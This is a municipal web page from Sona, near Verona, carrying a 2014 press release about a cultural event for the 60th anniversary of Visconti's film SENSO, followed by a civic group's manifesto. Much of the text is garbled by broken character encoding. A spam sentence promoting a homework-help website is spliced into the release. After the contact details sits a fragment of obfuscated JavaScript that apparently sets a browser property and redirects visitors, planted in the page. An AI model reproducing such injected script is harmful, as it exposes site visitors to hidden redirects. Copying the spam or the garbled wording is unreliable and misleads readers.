16 ai??i?? 21 settembre 2014. ai???Amore e guerra a Custozaai??? 60Ai?? Anniversario della candidatura del film SENSO di Luchino Visconti al Filmfestival di Venezia.

COMUNICATO STAMPA
15 Settembre 2014 – Sona (Verona)

16 ai??i?? 21 settembre 2014. ai???Receive feedback from your peers directly on college homework helper by https://college-homework-help.org/ the document.Amore e guerra a Custozaai??? 60Ai?? Anniversario della candidatura del film SENSO di Luchino Visconti al Filmfestival di Venezia

ai???Quando in Agosto siamo stati contattati dal presidente dellai??i??associazione CreaCustoza, Stefano Adami, e dal regista Carlo Saletti, che ci proponevano di collaborare al progetto di valorizzazione del 60Ai?? Anniversario della candidatura del film SENSO di Luchino Visconti al Filmfestival di Venezia del 1954, abbiamo apprezzato subito lai??i??idea e prontamente offerto la nostra piena collaborazione ai??i?? dichiara Antonella Dal Forno Assessore alla Cultura di Sona .-

A tale proposito martedAi?? 16 c.m. alle ore 11 presso il Comune di Sommacampagna ci sarAi?? una conferenza stampa, in quanto questo evento culturale esprime numerosi risvolti interessanti: da un lato, infatti, ripropone le vicissitudini storiche e cinematografiche legate alla produzione di questo film che ha costituito una svolta nella produzione artistica di Luchino Visconti e che da subito A? finito sotto i riflettori dei critici cinematografici e della censura politica. La conferenza di venerdAi?? 19 e la rappresentazione di sabato 20 settembre avranno molto da raccontarci al riguardo!ai??? (vedi programma)

ai???Amore e Guerra a Custozaai??? costituisce unai??i??ottima opportunitAi?? non solo per conoscere piA? da vicino il film SENSO, ma anche per richiamare alla memoria i fatti storici legati alle Guerre di Indipendenza e per scoprire la nostra gente ed i nostri luoghi nel ruolo corale e quasi epico di attrici ed attori nel grande film Visconti.

ai???Dai??i??altro lato ai??i?? prosegue la Dal Forno -, il progetto ai???Amore e Guerra a Custozaai??? A? molto interessante anche perchAi?? porta alla luce ed illustra lai??i??impatto che le riprese cinematografiche di questo film hanno avuto sul territorio dei nostri comuni, sulla gente di quel lontano 1954, quando i nostri paeselli furono scompigliati dal cast cinematografico e scenografico, un vero ai???Uragano dai??i??estateai??i??, come lo ha definito la scrittrice Elena Pigozzi che MercoledAi?? 17 settembre alle ore 20.30, in Sala Consigliare a Sona, illustrerAi?? questi aspetti del ai???backstageai??i?? cinematografico. Sentiremo raccontare anche le vicissitudini legate alla Cascina Pernisa di San Giorgio in Salici, luogo dai??i??azione di una delle battaglie risorgimentali e nota a qualcuno grazie alla figura di Marchetto de la Pernisa, piccolo eroe descritto dalla penna di Umberto di Giulio.ai???

Ringraziamo lai??i??associazione culturale CreaCustoza per aver ideato questo ambizioso progetto.

Per informazioni: Settore Cultura e Servizi Demografici ai??i?? Responsabile Raffaella Tessaro – Tel. 0456091229 ai??i?? e-mail r.tessaro@comune.sona.vr.it 800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Comments are closed.

Un nuovo futuro perSona

Ci accomuna un bisogno: quello di creare un nuovo modo di appartenere alla comunità.
Una strada concreta fatta di conoscenza, esperienza e analisi, elementi necessari allo sviluppo di nuove proposte solide e realizzabili.

Ci accomuna un forte senso di appartenenza a questa comunità che ci ha sempre visto coinvolti in prima persona in attività di interesse sociale e politico.
Attività che ci hanno preparato e motivato nel voler tradurre in realtà amministrativa un progetto libero dalle tattiche e dalle strategia di partito.

Ci accomuna l’esperienza e la competenza nei diversi settori stimolo per una nuova amministrazione basata su una programmazione attenta dei bisogni quotidiani ed essenziali dei cittadini; sull’ottimizzazione e la valorizzazione delle risorse e sull’identificazione di un programma di sviluppo del territorio.

Ci accomuna la voglia di fare, di provare a creare un futuro che è nostro e dei nostri figli, senza interessi, ma con lo spirito di servizio tipico del volontariato.

Ci muove la speranza di coinvolgere chi, come noi, ha voglia di rompere gli schemi della vecchia guardia politica e vuole rinnovare Sona e e sue frazioni per davvero.